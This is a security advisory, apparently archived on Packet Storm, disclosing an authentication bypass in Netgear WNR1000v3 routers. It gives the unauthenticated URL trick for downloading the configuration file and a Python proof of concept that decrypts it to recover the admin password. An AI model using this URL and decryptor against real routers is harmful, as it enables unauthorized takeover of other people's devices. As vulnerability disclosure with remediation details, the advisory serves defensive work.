exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Netgear WNR1000 Authentication Bypass

Netgear WNR1000 Authentication Bypass
Posted Mar 30, 2013
Authored by Roberto Paleari

Netgear WNR1000 suffers from an authentication bypass vulnerability.

tags | exploit, bypass
SHA-256 | 72c6cc5c8d4c418bcf9e4c0336a5047a0e2f2e3bb08d8d8efc6e07e63370d425

Netgear WNR1000 Authentication Bypass

Change Mirror Download
Authentication bypass on Netgear WNR1000
========================================

[ADVISORY INFORMATION]
Title: Authentication bypass on Netgear WNR1000
Discovery date: 10/11/2012
Release date: 29/03/2013
Credits: Roberto Paleari (roberto@greyhats.it, twitter: @rpaleari)

[VULNERABILITY INFORMATION]
Class: Authentication bypass, weak encryption

[AFFECTED PRODUCTS]
This security vulnerability affects the following products and firmware
versions:
* Netgear WNR1000v3, firmware version < 1.0.2.60

Other products and firmware versions are probably also vulnerable, but they
were not checked.

[VULNERABILITY DETAILS]
The web server running on the affected devices is subject to an authentication
bypass issue that allows attacker to gain administrative access, circumventing
existing authentication mechanisms.

Strictly speaking, the web server skips authentication checks for some URLs,
such as those that contain the substring ".jpg" (without quotes). As a
consequence, an attacker can retrieve the current device configuration by
accessing the following URL:

http://<target-ip-address>/NETGEAR_fwpt.cfg?.jpg

The resulting configuration file is encrypted. However the device implements a
trivial encryption scheme, that can be reversed quite easily. From the
configuration file, attackers can extract, among the other things, the
clear-text password for the "admin" user.

A Python procedure that implements the aforementioned encryption scheme
follows (the code of this PoC is inefficient and is quite a mess):

<cut>
import pyDes
import os, sys

# Encryption key is a slightly variation of "NtgrBak"
KEY = [0x56-8, 0x74, 0x67, 0x72, 0x42, 0x61, 0x6b, 0x00]

def derive_des_key(ascii_key):
def extract_by_offset(offset):
byte_index = offset >> 3
bit_index = byte_index << 3

v0 = (ascii_key[byte_index] << 8) | ascii_key[byte_index+1]
v1 = 8 - (offset - bit_index)
v0 >>= v1
return v0 & 0xfe

k = ""
for i in range(0, 7*8, 7):
k += chr(extract_by_offset(i))
return k

def decrypt_block(block, key_bytes):
k = derive_des_key(key_bytes)
des = pyDes.des(k, pyDes.ECB)
r = des.decrypt(block)
return r

def main():
data = sys.stdin.read()
assert (len(data) % 8) == 0

current_key = KEY[:]

r = ""
for i in range(0, len(data), 8):
current_key[0] += 8
if current_key[0] > 0xff:
current_key[0] = current_key[0] - 0x100
current_key[1] += 1

block = data[i:i+8]
d = decrypt_block(block, current_key)

r += d

sys.stdout.write(r)
</cut>


[REMEDIATION]
This issue has been addressed by Netgear with firmware version 1.0.2.60.

[DISCLAIMER]
The author is not responsible for the misuse of the information provided in
this security advisory. The advisory is a service to the professional security
community. There are NO WARRANTIES with regard to this information. Any
application or distribution of this information constitutes acceptance AS IS,
at the user's own risk. This information is subject to change without notice.
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close